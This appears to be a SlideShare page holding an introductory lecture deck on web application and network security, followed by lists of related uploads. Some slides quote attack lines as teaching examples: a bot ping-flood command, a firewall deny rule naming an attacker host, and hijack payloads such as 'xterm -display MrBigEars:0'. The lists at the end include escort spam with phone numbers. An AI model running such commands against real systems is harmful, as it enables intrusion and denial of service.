SlideShare a Scribd company logo

Web App and Network Security Essentials

Download as PPTX, PDF
Rishabh Mehan
Rishabh Mehan
Technology
1 of 42
Web Application and network security Rishabh Mehan
Saying Hello !!  To start off with the introduction lets go through few basics  What is a Web Application ?  Where is it Deployed ?  How can it be reached ?
Web Application
Protocols  HTTP – HTTPS  FTP – SFTP  TCP  SSH
Request Methods GET POST Form data encoded in the URL Data is included in the body of the request GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1 POST http://www.mysite.com/kgsearch/search.php HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ catid=1
How Request flows Server www.mybank.com (64.58.76.230) Port: 80 Client PC (10.1.0.123) Request Response
Words of Wisdom “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis
infrastructure Very complex architectures, multiple platforms, multiple protocols Web Application HTTP Network Business Logic Customer Identification Media Store Browser Web Servers Database Server Presentation Layer Wireless Application Server Content Services Access Controls Transaction Information Core Business Data
Why vulnerabilities Security Professionals Don‟t Know The Applications “As a Network Security Professional, I don‟t know how my companies web applications are supposed to work so I deploy a protective solution…but don‟t know if it‟s protecting what it‟s supposed to.” The Web Application Security Gap Application Developers and QA Professionals Don‟t Know Security “As an Application Developer, I can build great features and functions while meeting deadlines, but I don‟t know how to develop my web application with security as a feature.”
Common security attacks and their countermeasures  Finding a way into the network  Firewalls  Exploiting software bugs, buffer overflows  Intrusion Detection Systems  Denial of Service  Ingress filtering, IDS  TCP hijacking  IPSec  Packet sniffing  Encryption (SSH, SSL, HTTPS)  Social problems  Education
Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time  Difficult for users to keep up with changes and keep host secure  Solution  Administrators limit access to end hosts by using a firewall  Firewall is kept up-to-date by administrators
Firewalls Internet DMZ Firewall Firewall Web server, email server, web proxy, etc Intranet
Firewalls  What does a firewall rule look like?  Depends on the firewall used  Example: ipfw  /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls  Different graphical user interfaces  Varying amounts of complexity and power
Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks  SYN flooding  SMURF  Distributed attacks
Denial of Service  SYN flooding attack  Send SYN packets with bogus source address  Why?  Server responds with SYN ACK and keeps state about TCP half-open connection  Eventually, server memory is exhausted with this state  Solution: use “SYN cookies”  In response to a SYN, create a special “cookie” for the connection, and forget everything else  Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
Denial of Service
Denial of Service  SMURF  Source IP address of a broadcast ping is forged  Large number of machines respond back to victim, overloading it
Denial of Service ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply Internet Perpetrator Victim
Denial of Service  Distributed Denial of Service  Same techniques as regular DoS, but on a much larger scale  Example: Sub7Server Trojan and IRC bots  Infect a large number of machines with a “zombie” program  Zombie program logs into an IRC channel and awaits commands  Example:  Bot command: !p4 207.71.92.193  Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000  Sends 10,000 64k packets to the host (655MB!)  Read more at: http://grc.com/dos/grcdos.htm
TCP Attacks  Recall how IP works…  End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery  Source address – host may trick destination into believing that the packet is from a trusted source  Especially applications which use IP addresses as a simple authentication method  Solution – use better authentication methods
TCP Attacks  TCP connections have associated state  Starting sequence numbers, port numbers  Problem – what if an attacker learns these values?  Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)  Sequence numbers are sometimes chosen in very predictable ways
TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source  Ex. Instead of downloading and running new program, you download a virus and execute it
TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears
TCP Attacks  Alice and Bob have an established TCP connection
TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network  He can intercept all of their packets
TCP Attacks  First, Mr. Big Ears must drop all of Alice‟s packets since they must not be delivered to Bob (why?) Packets The Void
TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?  Can just DoS Alice instead of dropping her packets  Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted?  Mitnick: payload is “add self to .rhosts”  Or, “xterm -display MrBigEars:0”
TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user
TCP Attacks  How do we prevent this?  IPSec  Provides source authentication, so Mr. Big Ears cannot pretend to be Alice  Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn‟t get any easier to figure out what data is being transmitted over the network!
Packet Sniffing  How can we protect ourselves?  SSH, not Telnet  Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)  Now that I have told you this, please do not exploit this information  Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL  Especially when making purchases with credit cards!  SFTP, not FTP  Unless you really don‟t care about the password or data  Can also use KerbFTP (download from MyAndrew)  IPSec  Provides network-layer confidentiality
Web Application Vulnerabilities Web application vulnerabilities occur in multiple areas. Application Administration Extension Checking Common File Checks Platform Known Vulnerabilities Application Mapping Custom Application Scripting Data Extension Checking Parameter Manipulation Backup Checking Reverse Directory Transversal Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing Cookie Manipulation Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting
What the #@$& is happening ??? % Info Disclosure, 3 Info Disclosure Axis Title File Include File Include Input Valdation Input Valdation Auth Auth % SQL Injection SQL Injection XSS XSS 0 10 20 30 Axis Title 40 50
Web Application Vulnerabilities Platform:  Known vulnerabilities can be Platform Known Vulnerabilities exploited immediately with a minimum amount of skill or experience – “script kiddies”  Most easily defendable of all web vulnerabilities  MUST have streamlined patching procedures
Web Application Vulnerabilities Administration: Administration Extension Checking Common File Checks Data Extension Checking • • • Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing • • Less easily corrected than known issues Require increased awareness More than just configuration, must be aware of security flaws in actual content Remnant files can reveal applications and versions in use Backup files can reveal source code and database connection strings
Web Application Vulnerabilities Application Programming: • Application Application Mapping Cookie Manipulation Custom Application Scripting Parameter Manipulation Reverse Directory Transversal Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting Common coding techniques do not necessarily include security • Input is Administration assumed to be valid, but not tested • Unexamined input from a browser can inject scripts into page for replay against later visitors • Unhandled error messages reveal application and database structures • Unchecked database calls can be „piggybacked‟ with a hacker‟s own database call, giving direct access to business data through a web browser
Examples  http://demo.testfire.net/  http://chat.wallhood.com/moving/moving/images/
How to Secure Web Applications  Incorporate security into the lifecycle  Apply information security principles to all software development efforts  Educate  Issue awareness, Training, etc…
Are We still Secure ? LOL NO
Questions ?

Recommended

Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Webroyans
 
Design Reviewing The Web
Design Reviewing The WebDesign Reviewing The Web
Design Reviewing The Webamiable_indian
 
Network security
Network securityNetwork security
Network securitysyed mehdi raza
 
Computer network (2)
Computer network (2)Computer network (2)
Computer network (2)NYversity
 
Network Security
Network SecurityNetwork Security
Network SecurityDURYODHAN MAHAPATRA
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorialMSA Technosoft
 
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacksKipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacksKipp Berdiansky
 
Hacking
HackingHacking
Hackingrameswara reddy venkat
 

Recommended

Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Webroyans
 
Design Reviewing The Web
Design Reviewing The WebDesign Reviewing The Web
Design Reviewing The Webamiable_indian
 
Network security
Network securityNetwork security
Network securitysyed mehdi raza
 
Computer network (2)
Computer network (2)Computer network (2)
Computer network (2)NYversity
 
Network Security
Network SecurityNetwork Security
Network SecurityDURYODHAN MAHAPATRA
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorialMSA Technosoft
 
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacksKipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacksKipp Berdiansky
 
Hacking
HackingHacking
Hackingrameswara reddy venkat
 
Hacking
HackingHacking
HackingRoshan Chaudhary
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9Geoff Pesimo
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In DetailGreater Noida Institute Of Technology
 
ip spoofing
ip spoofingip spoofing
ip spoofingvipin soni
 
Ip Spoofing
Ip SpoofingIp Spoofing
Ip Spoofingarpit.arp
 
Find ip address
Find ip addressFind ip address
Find ip addresssasandeaynat
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question CollectionManish Luintel
 
Dns tunnelling its all in the name
Dns tunnelling its all in the nameDns tunnelling its all in the name
Dns tunnelling its all in the nameSecurity BSides London
 
Ip spoofing ppt
Ip spoofing pptIp spoofing ppt
Ip spoofing pptAnushakp9
 
Ip spoofing attacks
Ip spoofing attacksIp spoofing attacks
Ip spoofing attacksApijay Kumar
 
CMIT 321 QUIZ 1
CMIT 321 QUIZ 1CMIT 321 QUIZ 1
CMIT 321 QUIZ 1HamesKellor
 
Spoofing
SpoofingSpoofing
SpoofingGreater Noida Institute Of Technology
 
Proposed Methods of IP Spoofing Detection & Prevention
Proposed Methods of IP Spoofing Detection & Prevention Proposed Methods of IP Spoofing Detection & Prevention
Proposed Methods of IP Spoofing Detection & Prevention International Journal of Science and Research (IJSR)
 
Ipspoofing
IpspoofingIpspoofing
IpspoofingAkhil Kumar
 
How to use packet sniffers
How to use packet sniffersHow to use packet sniffers
How to use packet sniffersDeepika Padmanabhan
 
Hacking
HackingHacking
HackingSweta Leena Panda
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigationsMukesh Chaudhari
 
Network Security and Spoofing Attacks
Network Security and Spoofing AttacksNetwork Security and Spoofing Attacks
Network Security and Spoofing AttacksPECB
 
Hacking
HackingHacking
HackingSUNY Oneonta
 
Internet security
Internet securityInternet security
Internet securitygohel
 
Authentication Application in Network Security NS4
Authentication Application in Network Security NS4Authentication Application in Network Security NS4
Authentication Application in Network Security NS4koolkampus
 
Cryptography.ppt
Cryptography.pptCryptography.ppt
Cryptography.pptkusum sharma
 

More Related Content

What's hot

Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9Geoff Pesimo
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question CollectionManish Luintel
 
Ip spoofing ppt
Ip spoofing pptIp spoofing ppt
Ip spoofing pptAnushakp9
 
Ip spoofing attacks
Ip spoofing attacksIp spoofing attacks
Ip spoofing attacksApijay Kumar
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigationsMukesh Chaudhari
 
Network Security and Spoofing Attacks
Network Security and Spoofing AttacksNetwork Security and Spoofing Attacks
Network Security and Spoofing AttacksPECB
 
Internet security
Internet securityInternet security
Internet securitygohel
 

What's hot (20)

Hacking
HackingHacking
Hacking
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 
ip spoofing
ip spoofingip spoofing
ip spoofing
 
Ip Spoofing
Ip SpoofingIp Spoofing
Ip Spoofing
 
Find ip address
Find ip addressFind ip address
Find ip address
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question Collection
 
Dns tunnelling its all in the name
Dns tunnelling its all in the nameDns tunnelling its all in the name
Dns tunnelling its all in the name
 
Ip spoofing ppt
Ip spoofing pptIp spoofing ppt
Ip spoofing ppt
 
Ip spoofing attacks
Ip spoofing attacksIp spoofing attacks
Ip spoofing attacks
 
CMIT 321 QUIZ 1
CMIT 321 QUIZ 1CMIT 321 QUIZ 1
CMIT 321 QUIZ 1
 
Spoofing
SpoofingSpoofing
Spoofing
 
Proposed Methods of IP Spoofing Detection & Prevention
Proposed Methods of IP Spoofing Detection & Prevention Proposed Methods of IP Spoofing Detection & Prevention
Proposed Methods of IP Spoofing Detection & Prevention
 
Ipspoofing
IpspoofingIpspoofing
Ipspoofing
 
How to use packet sniffers
How to use packet sniffersHow to use packet sniffers
How to use packet sniffers
 
Hacking
HackingHacking
Hacking
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigations
 
Network Security and Spoofing Attacks
Network Security and Spoofing AttacksNetwork Security and Spoofing Attacks
Network Security and Spoofing Attacks
 
Hacking
HackingHacking
Hacking
 
Internet security
Internet securityInternet security
Internet security
 

Viewers also liked

Authentication Application in Network Security NS4
Authentication Application in Network Security NS4Authentication Application in Network Security NS4
Authentication Application in Network Security NS4koolkampus
 
Network Security Applications
Network Security ApplicationsNetwork Security Applications
Network Security ApplicationsHatem Mahmoud
 
Presentation1 new (1) (1)cf
Presentation1 new (1) (1)cfPresentation1 new (1) (1)cf
Presentation1 new (1) (1)cftoamma
 
Network Security Tools and applications
Network Security Tools and applicationsNetwork Security Tools and applications
Network Security Tools and applicationswebhostingguy
 
Contaminacion del aire y de las aguas
Contaminacion del aire y de las aguas Contaminacion del aire y de las aguas
Contaminacion del aire y de las aguas Jorge Salazar
 
Network security & cryptography
Network security & cryptographyNetwork security & cryptography
Network security & cryptographypinkutinku26
 
Celebrity Cricket League 2016 - http://ccl5.com/
Celebrity Cricket League 2016 - http://ccl5.com/ Celebrity Cricket League 2016 - http://ccl5.com/
Celebrity Cricket League 2016 - http://ccl5.com/ Tania Agni
 
Rashed al kamdah network security threats
Rashed al kamdah network security threatsRashed al kamdah network security threats
Rashed al kamdah network security threatsrashidalkamdah
 
Cryptography and network security
Cryptography and network security Cryptography and network security
Cryptography and network securityMahipesh Satija
 
Presentation network security
Presentation network securityPresentation network security
Presentation network securitycegonsoft1999
 
Network security and cryptography
Network security and cryptographyNetwork security and cryptography
Network security and cryptographyPavithra renu
 
Network and network security
Network and network securityNetwork and network security
Network and network securityRuchi Gupta
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic conceptsKhoa Nguyen
 

Viewers also liked (20)

Authentication Application in Network Security NS4
Authentication Application in Network Security NS4Authentication Application in Network Security NS4
Authentication Application in Network Security NS4
 
Cryptography.ppt
Cryptography.pptCryptography.ppt
Cryptography.ppt
 
Network Security Applications
Network Security ApplicationsNetwork Security Applications
Network Security Applications
 
Party pronto pres new
Party pronto pres newParty pronto pres new
Party pronto pres new
 
Basic Network Security_Primer
Basic Network Security_PrimerBasic Network Security_Primer
Basic Network Security_Primer
 
Presentation1 new (1) (1)cf
Presentation1 new (1) (1)cfPresentation1 new (1) (1)cf
Presentation1 new (1) (1)cf
 
Networksecurity&cryptography
Networksecurity&cryptographyNetworksecurity&cryptography
Networksecurity&cryptography
 
Network Security Tools and applications
Network Security Tools and applicationsNetwork Security Tools and applications
Network Security Tools and applications
 
Contaminacion del aire y de las aguas
Contaminacion del aire y de las aguas Contaminacion del aire y de las aguas
Contaminacion del aire y de las aguas
 
E securty
E securtyE securty
E securty
 
Kerberos (1)
Kerberos (1)Kerberos (1)
Kerberos (1)
 
Network security & cryptography
Network security & cryptographyNetwork security & cryptography
Network security & cryptography
 
Celebrity Cricket League 2016 - http://ccl5.com/
Celebrity Cricket League 2016 - http://ccl5.com/ Celebrity Cricket League 2016 - http://ccl5.com/
Celebrity Cricket League 2016 - http://ccl5.com/
 
Rashed al kamdah network security threats
Rashed al kamdah network security threatsRashed al kamdah network security threats
Rashed al kamdah network security threats
 
Cryptography and network security
Cryptography and network security Cryptography and network security
Cryptography and network security
 
Presentation network security
Presentation network securityPresentation network security
Presentation network security
 
Network security and cryptography
Network security and cryptographyNetwork security and cryptography
Network security and cryptography
 
Network and network security
Network and network securityNetwork and network security
Network and network security
 
Nymble: Blocking System
Nymble: Blocking SystemNymble: Blocking System
Nymble: Blocking System
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic concepts
 

Similar to Web App and Network Security Essentials

Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
The Network Protocol Stack Revisited
The Network Protocol Stack RevisitedThe Network Protocol Stack Revisited
The Network Protocol Stack Revisitedinbroker
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???trendy updates
 
Understanding computer networks
Understanding computer networksUnderstanding computer networks
Understanding computer networksUC San Diego
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentalsTariq kanher
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityAbdul Wahid
 
Root via sms. 4G security assessment
Root via sms. 4G security assessment Root via sms. 4G security assessment
Root via sms. 4G security assessment Sergey Gordeychik
 
T C P I P Weaknesses And Solutions
T C P I P Weaknesses And SolutionsT C P I P Weaknesses And Solutions
T C P I P Weaknesses And Solutionseroglu
 
Simplified Networking and Troubleshooting for K-12 Teachers
Simplified Networking and Troubleshooting for K-12 TeachersSimplified Networking and Troubleshooting for K-12 Teachers
Simplified Networking and Troubleshooting for K-12 Teacherswebhostingguy
 
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...Sandro Gauci
 
Open source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysisOpen source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysisGTKlondike
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackKaustubh Padwad
 

Similar to Web App and Network Security Essentials (20)

Network seurity
Network seurityNetwork seurity
Network seurity
 
Internet security
Internet securityInternet security
Internet security
 
Hacking Cisco
Hacking CiscoHacking Cisco
Hacking Cisco
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 
The Network Protocol Stack Revisited
The Network Protocol Stack RevisitedThe Network Protocol Stack Revisited
The Network Protocol Stack Revisited
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???
 
Understanding computer networks
Understanding computer networksUnderstanding computer networks
Understanding computer networks
 
12 tcp-dns
12 tcp-dns12 tcp-dns
12 tcp-dns
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
 
3.Network
3.Network3.Network
3.Network
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
08 tcp-dns
08 tcp-dns08 tcp-dns
08 tcp-dns
 
Root via sms. 4G security assessment
Root via sms. 4G security assessment Root via sms. 4G security assessment
Root via sms. 4G security assessment
 
T C P I P Weaknesses And Solutions
T C P I P Weaknesses And SolutionsT C P I P Weaknesses And Solutions
T C P I P Weaknesses And Solutions
 
Simplified Networking and Troubleshooting for K-12 Teachers
Simplified Networking and Troubleshooting for K-12 TeachersSimplified Networking and Troubleshooting for K-12 Teachers
Simplified Networking and Troubleshooting for K-12 Teachers
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2
 
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
 
Open source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysisOpen source network forensics and advanced pcap analysis
Open source network forensics and advanced pcap analysis
 
DDoS-bdNOG
DDoS-bdNOGDDoS-bdNOG
DDoS-bdNOG
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 

Recently uploaded

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
